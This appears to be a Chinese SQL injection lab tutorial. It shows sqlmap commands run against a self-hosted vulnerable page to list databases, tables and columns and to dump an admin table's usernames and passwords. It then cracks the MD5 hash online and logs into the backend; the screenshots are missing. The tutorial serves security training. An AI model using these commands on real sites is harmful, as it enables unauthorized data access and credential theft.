SQL注入基础步骤及SQLMap工具使用(二)
一、环境搭建
(一)、phpstudy2018集成环境安装使用
安装使用,自行百度,下载地址:官网地址
1. http://phpstudy.php.cn/
(二)、SQL注入源码
百度网盘:
1. 链接:https://pan.baidu.com/s/1B0VSwXk6JnZbBpRgr5S3iQ 密码:wgze
(三)、SQLMap
SQLMap为Kali Linux平台集成工具
图示:
(四)、图示
目标网站:
1. http://localhost/sqls/index.php?id=1
二、SQL注入过程详解
(一)、查找注入点
前面已经讲过不在赘述,注入点:
1. 1.http://localhost/sqls/index.php?id=1
(二)、SQLMap测试注入
1. sqlmap -u "http://192.168.21.100/sqls/index.php?id=1"
结果:
(三)、获取后台账号、密码
(1)、获取目标数据库
1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" --dbs
图示:
(2)、获取目标表名
root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test --tables
图示:
(3)、获取目标字段
1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin --columns
图示:
(4)、获取字段内容
1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin -C "user,pwd" --dump
图示:
(5)、MD5在线破解
网站:
1. http://www.cmd5.com/
结果:密码-qazxsw
三、登录后台
图示:
最后说明:
以上只是SQLMap简单实用,参考:https://blog.csdn.net/qq1124794084/article/details/77851094想了解更多,可自行百度。
1.
1.
1.
1.
2.
1.
1.
1.
1.
1.